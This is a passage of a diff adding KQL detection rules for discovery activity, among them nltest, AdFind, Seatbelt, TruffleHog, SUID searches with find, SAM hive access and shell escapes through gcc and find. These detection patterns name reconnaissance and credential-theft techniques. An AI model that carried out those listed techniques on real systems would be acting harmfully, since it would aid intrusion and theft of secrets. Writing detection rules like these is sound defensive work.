attack.discovery, attack.t1082 +// False Positives: +// - Legitimate system administrator usage of these commands +// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -" and ProcessCommandLine contains "i") and (ProcessCommandLine contains " -" and ProcessCommandLine contains "d")) and ProcessCommandLine endswith " /" and FolderPath endswith "/ls" \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql b/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql new file mode 100644 index 00000000..abd1bb78 --- /dev/null +++ b/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql @@ -0,0 +1,10 @@ +// Title: Potential Discovery Activity Using Find - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-28 +// Level: medium +// Description: Detects usage of "find" binary in a suspicious manner to perform discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-perm -4000" or ProcessCommandLine contains "-perm -2000" or ProcessCommandLine contains "-perm 0777" or ProcessCommandLine contains "-perm -222" or ProcessCommandLine contains "-perm -o w" or ProcessCommandLine contains "-perm -o x" or ProcessCommandLine contains "-perm -u=s" or ProcessCommandLine contains "-perm -g=s") and FolderPath endswith "/find" \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql b/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql new file mode 100644 index 00000000..37b07f74 --- /dev/null +++ b/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql @@ -0,0 +1,10 @@ +// Title: Potential Discovery Activity Using Find - MacOS +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-28 +// Level: medium +// Description: Detects usage of "find" binary in a suspicious manner to perform discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-perm -4000" or ProcessCommandLine contains "-perm -2000" or ProcessCommandLine contains "-perm 0777" or ProcessCommandLine contains "-perm -222" or ProcessCommandLine contains "-perm -o w" or ProcessCommandLine contains "-perm -o x" or ProcessCommandLine contains "-perm -u=s" or ProcessCommandLine contains "-perm -g=s") and FolderPath endswith "/find" \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql b/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql new file mode 100644 index 00000000..7f254cfd --- /dev/null +++ b/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential Discovery Activity Via Dnscmd.EXE +// Author: @gott_cyber +// Date: 2022-07-31 +// Level: medium +// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution +// False Positives: +// - Legitimate administration use + +DeviceProcessEvents +| where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql b/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql new file mode 100644 index 00000000..56d503e2 --- /dev/null +++ b/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql @@ -0,0 +1,10 @@ +// Title: Potential GobRAT File Discovery Via Grep +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: high +// Description: Detects the use of grep to discover specific files created by the GobRAT malware +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents +| where (ProcessCommandLine contains "apached" or ProcessCommandLine contains "frpc" or ProcessCommandLine contains "sshd.sh" or ProcessCommandLine contains "zone.arm") and FolderPath endswith "/grep" \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql b/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql new file mode 100644 index 00000000..803abea3 --- /dev/null +++ b/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential Recon Activity Using DriverQuery.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-19 +// Level: high +// Description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers +// MITRE Tactic: Discovery +// Tags: attack.discovery +// False Positives: +// - Legitimate usage by some scripts might trigger this as well + +DeviceProcessEvents +| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\")) \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql b/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql new file mode 100644 index 00000000..48cc0519 --- /dev/null +++ b/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential Recon Activity Via Nltest.EXE +// Author: Craig Young, oscd.community, Georg Lauenstein +// Date: 2021-07-24 +// Level: medium +// Description: Detects nltest commands that can be used for information discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016, attack.t1482 +// False Positives: +// - Legitimate administration use but user and host must be investigated + +DeviceProcessEvents +| where (FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe") and ((ProcessCommandLine contains "server" and ProcessCommandLine contains "query") or (ProcessCommandLine contains "/user" or ProcessCommandLine contains "all_trusts" or ProcessCommandLine contains "dclist:" or ProcessCommandLine contains "dnsgetdc:" or ProcessCommandLine contains "domain_trusts" or ProcessCommandLine contains "dsgetdc:" or ProcessCommandLine contains "parentdomain" or ProcessCommandLine contains "trusted_domains")) \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql new file mode 100644 index 00000000..afcfebbf --- /dev/null +++ b/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql @@ -0,0 +1,12 @@ +// Title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS +// Author: blueteamer8699 +// Date: 2022-01-03 +// Level: medium +// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql b/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql new file mode 100644 index 00000000..7f46bb95 --- /dev/null +++ b/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - AdFind Suspicious Execution +// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community +// Date: 2021-02-02 +// Level: high +// Description: Detects AdFind execution with common flags seen used during attacks +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u +// False Positives: +// - Legitimate admin activity + +DeviceProcessEvents +| where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains " dclist " or ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd" \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_adidnsdump_execution.kql b/KQL/rules/Discovery/pua_adidnsdump_execution.kql new file mode 100644 index 00000000..79eeabda --- /dev/null +++ b/KQL/rules/Discovery/pua_adidnsdump_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - Adidnsdump Execution +// Author: frack113 +// Date: 2022-01-01 +// Level: low +// Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, +Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1018 + +DeviceProcessEvents +| where ProcessCommandLine contains "adidnsdump" and FolderPath endswith "\\python.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql b/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql new file mode 100644 index 00000000..26f2dee9 --- /dev/null +++ b/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - Advanced IP Scanner Execution +// Author: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy +// Date: 2020-05-12 +// Level: medium +// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046, attack.t1135 +// False Positives: +// - Legitimate administrative use + +DeviceProcessEvents +| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_ip_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_ip_scanner" or ProcessVersionInfoFileDescription contains "Advanced IP Scanner") \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql b/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql new file mode 100644 index 00000000..78716ab9 --- /dev/null +++ b/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql @@ -0,0 +1,13 @@ +// Title: PUA - Advanced Port Scanner Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-18 +// Level: medium +// Description: Detects the use of Advanced Port Scanner. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046, attack.t1135 +// False Positives: +// - Legitimate administrative use +// - Tools with similar commandline (very rare) + +DeviceProcessEvents +| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_port_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_port_scanner" or ProcessVersionInfoFileDescription contains "Advanced Port Scanner") \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_crassus_execution.kql b/KQL/rules/Discovery/pua_crassus_execution.kql new file mode 100644 index 00000000..bf5dfd90 --- /dev/null +++ b/KQL/rules/Discovery/pua_crassus_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - Crassus Execution +// Author: pH-T (Nextron Systems) +// Date: 2023-04-17 +// Level: high +// Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.reconnaissance, attack.t1590.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\Crassus.exe" or ProcessVersionInfoOriginalFileName =~ "Crassus.exe" or ProcessVersionInfoFileDescription contains "Crassus" \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql b/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql new file mode 100644 index 00000000..b700d762 --- /dev/null +++ b/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - Nmap/Zenmap Execution +// Author: frack113 +// Date: 2021-12-10 +// Level: medium +// Description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate administrator activity + +DeviceProcessEvents +| where (FolderPath endswith "\\nmap.exe" or FolderPath endswith "\\zennmap.exe") or (ProcessVersionInfoOriginalFileName in~ ("nmap.exe", "zennmap.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_seatbelt_execution.kql b/KQL/rules/Discovery/pua_seatbelt_execution.kql new file mode 100644 index 00000000..a439ff51 --- /dev/null +++ b/KQL/rules/Discovery/pua_seatbelt_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - Seatbelt Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-18 +// Level: high +// Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1526, attack.t1087, attack.t1083 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\Seatbelt.exe" or ProcessVersionInfoOriginalFileName =~ "Seatbelt.exe" or ProcessVersionInfoFileDescription =~ "Seatbelt" or (ProcessCommandLine contains " DpapiMasterKeys" or ProcessCommandLine contains " InterestingProcesses" or ProcessCommandLine contains " InterestingFiles" or ProcessCommandLine contains " CertificateThumbprints" or ProcessCommandLine contains " ChromiumBookmarks" or ProcessCommandLine contains " ChromiumHistory" or ProcessCommandLine contains " ChromiumPresence" or ProcessCommandLine contains " CloudCredentials" or ProcessCommandLine contains " CredEnum" or ProcessCommandLine contains " CredGuard" or ProcessCommandLine contains " FirefoxHistory" or ProcessCommandLine contains " ProcessCreationEvents")) or ((ProcessCommandLine contains " -group=misc" or ProcessCommandLine contains " -group=remote" or ProcessCommandLine contains " -group=chromium" or ProcessCommandLine contains " -group=slack" or ProcessCommandLine contains " -group=system" or ProcessCommandLine contains " -group=user" or ProcessCommandLine contains " -group=all") and ProcessCommandLine contains " -outputfile=") \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql b/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql new file mode 100644 index 00000000..7b58afa9 --- /dev/null +++ b/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql @@ -0,0 +1,14 @@ +// Title: PUA - SoftPerfect Netscan Execution +// Author: @d4ns4n_ (Wuerth-Phoenix) +// Date: 2024-04-25 +// Level: medium +// Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks. +It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate administrator activity + +DeviceProcessEvents +| where FolderPath endswith "\\netscan.exe" or ProcessVersionInfoProductName =~ "Network Scanner" or ProcessVersionInfoFileDescription =~ "Application for scanning networks" \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql b/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql new file mode 100644 index 00000000..99346fc1 --- /dev/null +++ b/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql @@ -0,0 +1,12 @@ +// Title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE +// Author: frack113 +// Date: 2021-12-13 +// Level: high +// Description: Detects active directory enumeration activity using known AdFind CLI flags +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.002 +// False Positives: +// - Authorized administrative activity + +DeviceProcessEvents +| where ProcessCommandLine contains "-sc admincountdmp" or ProcessCommandLine contains "-sc exchaddresses" or (ProcessCommandLine contains "lockoutduration" or ProcessCommandLine contains "lockoutthreshold" or ProcessCommandLine contains "lockoutobservationwindow" or ProcessCommandLine contains "maxpwdage" or ProcessCommandLine contains "minpwdage" or ProcessCommandLine contains "minpwdlength" or ProcessCommandLine contains "pwdhistorylength" or ProcessCommandLine contains "pwdproperties") \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_trufflehog_execution.kql b/KQL/rules/Discovery/pua_trufflehog_execution.kql new file mode 100644 index 00000000..167f98c1 --- /dev/null +++ b/KQL/rules/Discovery/pua_trufflehog_execution.kql @@ -0,0 +1,15 @@ +// Title: PUA - TruffleHog Execution +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-24 +// Level: medium +// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. +While it is a legitimate tool, intended for use in CI pipelines and security assessments, +It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001 +// False Positives: +// - Legitimate use of TruffleHog by security teams or developers. + +DeviceProcessEvents +| where FolderPath endswith "\\trufflehog.exe" or ((ProcessCommandLine contains " docker --image " or ProcessCommandLine contains " Git " or ProcessCommandLine contains " GitHub " or ProcessCommandLine contains " Jira " or ProcessCommandLine contains " Slack " or ProcessCommandLine contains " Confluence " or ProcessCommandLine contains " SharePoint " or ProcessCommandLine contains " s3 " or ProcessCommandLine contains " gcs ") and ProcessCommandLine contains " --results=verified") \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql b/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql new file mode 100644 index 00000000..1ea32800 --- /dev/null +++ b/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql @@ -0,0 +1,15 @@ +// Title: PUA - TruffleHog Execution - Linux +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-24 +// Level: medium +// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. +While it is a legitimate tool, intended for use in CI pipelines and security assessments, +It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001 +// False Positives: +// - Legitimate use of TruffleHog by security teams or developers. + +DeviceProcessEvents +| where FolderPath endswith "/trufflehog" or ((ProcessCommandLine contains " docker --image " or ProcessCommandLine contains " Git " or ProcessCommandLine contains " GitHub " or ProcessCommandLine contains " Jira " or ProcessCommandLine contains " Slack " or ProcessCommandLine contains " Confluence " or ProcessCommandLine contains " SharePoint " or ProcessCommandLine contains " s3 " or ProcessCommandLine contains " gcs ") and ProcessCommandLine contains " --results=verified") \ No newline at end of file diff --git a/KQL/rules/Discovery/python_initiated_connection.kql b/KQL/rules/Discovery/python_initiated_connection.kql new file mode 100644 index 00000000..e75ac528 --- /dev/null +++ b/KQL/rules/Discovery/python_initiated_connection.kql @@ -0,0 +1,12 @@ +// Title: Python Initiated Connection +// Author: frack113 +// Date: 2021-12-10 +// Level: medium +// Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying. + +DeviceNetworkEvents +| where (InitiatingProcessFolderPath contains "\\python" and InitiatingProcessFolderPath contains ".exe") and (not(((RemoteIP =~ "127.0.0.1" and LocalIP =~ "127.0.0.1") or (InitiatingProcessCommandLine contains "pip.exe" and InitiatingProcessCommandLine contains "install")))) and (not((((InitiatingProcessCommandLine contains ":\\ProgramData\\Anaconda3\\Scripts\\conda-script.py" and InitiatingProcessCommandLine contains "update") and InitiatingProcessParentFileName =~ "conda.exe") or (InitiatingProcessCommandLine contains "C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py" and InitiatingProcessParentFileName =~ "python.exe")))) \ No newline at end of file diff --git a/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql b/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql new file mode 100644 index 00000000..1ca3a7f5 --- /dev/null +++ b/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql @@ -0,0 +1,12 @@ +// Title: Recon Command Output Piped To Findstr.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2023-07-06 +// Level: medium +// Description: Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. +Attackers often time use this technique to extract specific information they require in their reconnaissance phase. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1057 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "ipconfig" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "net" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "netstat" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "ping" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "systeminfo" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "tasklist" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "whoami" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find")) and (not((ProcessCommandLine contains "cmd.exe /c TASKLIST /V |" and ProcessCommandLine contains "FIND /I" and ProcessCommandLine contains "\\xampp\\" and ProcessCommandLine contains "\\catalina_start.bat"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/renamed_whoami_execution.kql b/KQL/rules/Discovery/renamed_whoami_execution.kql new file mode 100644 index 00000000..d4781e91 --- /dev/null +++ b/KQL/rules/Discovery/renamed_whoami_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Whoami Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-12 +// Level: critical +// Description: Detects the execution of whoami that has been renamed to a different name to avoid detection +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "whoami.exe" and (not(FolderPath endswith "\\whoami.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/sam_registry_hive_handle_request.kql b/KQL/rules/Discovery/sam_registry_hive_handle_request.kql new file mode 100644 index 00000000..8ee8f789 --- /dev/null +++ b/KQL/rules/Discovery/sam_registry_hive_handle_request.kql @@ -0,0 +1,10 @@ +// Title: SAM Registry Hive Handle Request +// Author: Roberto Rodriguez @Cyb3rWard0g +// Date: 2019-08-12 +// Level: high +// Description: Detects handles requested to SAM registry hive +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1012, attack.credential-access, attack.t1552.002 + +DeviceRegistryEvents +| where RegistryKey endswith "\\SAM" \ No newline at end of file diff --git a/KQL/rules/Discovery/security_software_discovery_linux.kql b/KQL/rules/Discovery/security_software_discovery_linux.kql new file mode 100644 index 00000000..d85befda --- /dev/null +++ b/KQL/rules/Discovery/security_software_discovery_linux.kql @@ -0,0 +1,12 @@ +// Title: Security Software Discovery - Linux +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518.001 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "nessusd" or ProcessCommandLine contains "td-agent" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "osqueryd" or ProcessCommandLine contains "cbagentd" or ProcessCommandLine contains "falcond") and (FolderPath endswith "/grep" or FolderPath endswith "/egrep") \ No newline at end of file diff --git a/KQL/rules/Discovery/security_software_discovery_macos.kql b/KQL/rules/Discovery/security_software_discovery_macos.kql new file mode 100644 index 00000000..26007344 --- /dev/null +++ b/KQL/rules/Discovery/security_software_discovery_macos.kql @@ -0,0 +1,12 @@ +// Title: Security Software Discovery - MacOs +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: medium +// Description: Detects usage of system utilities (only grep for now) to discover security software discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518.001 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where FolderPath =~ "/usr/bin/grep" and ((ProcessCommandLine contains "nessusd" or ProcessCommandLine contains "santad" or ProcessCommandLine contains "CbDefense" or ProcessCommandLine contains "falcond" or ProcessCommandLine contains "td-agent" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "osqueryd" or ProcessCommandLine contains "BlockBlock" or ProcessCommandLine contains "LuLu") or (ProcessCommandLine contains "Little" and ProcessCommandLine contains "Snitch")) \ No newline at end of file diff --git a/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql b/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql new file mode 100644 index 00000000..7a8b4c02 --- /dev/null +++ b/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql @@ -0,0 +1,12 @@ +// Title: Security Tools Keyword Lookup Via Findstr.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2023-10-20 +// Level: medium +// Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. +This detection focuses on the keywords that the attacker might use as a filter. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518.001 + +DeviceProcessEvents +| where (ProcessCommandLine endswith " avira" or ProcessCommandLine endswith " avira\"" or ProcessCommandLine endswith " cb" or ProcessCommandLine endswith " cb\"" or ProcessCommandLine endswith " cylance" or ProcessCommandLine endswith " cylance\"" or ProcessCommandLine endswith " defender" or ProcessCommandLine endswith " defender\"" or ProcessCommandLine endswith " kaspersky" or ProcessCommandLine endswith " kaspersky\"" or ProcessCommandLine endswith " kes" or ProcessCommandLine endswith " kes\"" or ProcessCommandLine endswith " mc" or ProcessCommandLine endswith " mc\"" or ProcessCommandLine endswith " sec" or ProcessCommandLine endswith " sec\"" or ProcessCommandLine endswith " sentinel" or ProcessCommandLine endswith " sentinel\"" or ProcessCommandLine endswith " symantec" or ProcessCommandLine endswith " symantec\"" or ProcessCommandLine endswith " virus" or ProcessCommandLine endswith " virus\"") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql b/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql new file mode 100644 index 00000000..639d1101 --- /dev/null +++ b/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql @@ -0,0 +1,12 @@ +// Title: Share And Session Enumeration Using Net.EXE +// Author: Endgame, JHasenbusch (ported for oscd.community) +// Date: 2018-10-30 +// Level: low +// Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1018 +// False Positives: +// - Legitimate use of net.exe utility by legitimate user + +DeviceProcessEvents +| where (ProcessCommandLine contains "view" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine contains "\\\\")) \ No newline at end of file diff --git a/KQL/rules/Discovery/shell_execution_gcc_linux.kql b/KQL/rules/Discovery/shell_execution_gcc_linux.kql new file mode 100644 index 00000000..f26d978b --- /dev/null +++ b/KQL/rules/Discovery/shell_execution_gcc_linux.kql @@ -0,0 +1,11 @@ +// Title: Shell Execution GCC - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/bin/bash,-s" or ProcessCommandLine contains "/bin/dash,-s" or ProcessCommandLine contains "/bin/fish,-s" or ProcessCommandLine contains "/bin/sh,-s" or ProcessCommandLine contains "/bin/zsh,-s") and (ProcessCommandLine contains "-wrapper" and (FolderPath endswith "/c89" or FolderPath endswith "/c99" or FolderPath endswith "/gcc")) \ No newline at end of file diff --git a/KQL/rules/Discovery/shell_execution_via_find_linux.kql b/KQL/rules/Discovery/shell_execution_via_find_linux.kql new file mode 100644 index 00000000..b67ef0be --- /dev/null +++ b/KQL/rules/Discovery/shell_execution_via_find_linux.kql @@ -0,0 +1,11 @@ +// Title: Shell Execution via Find - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt. + +// MITRE Tactic: Discovery +// Tags: 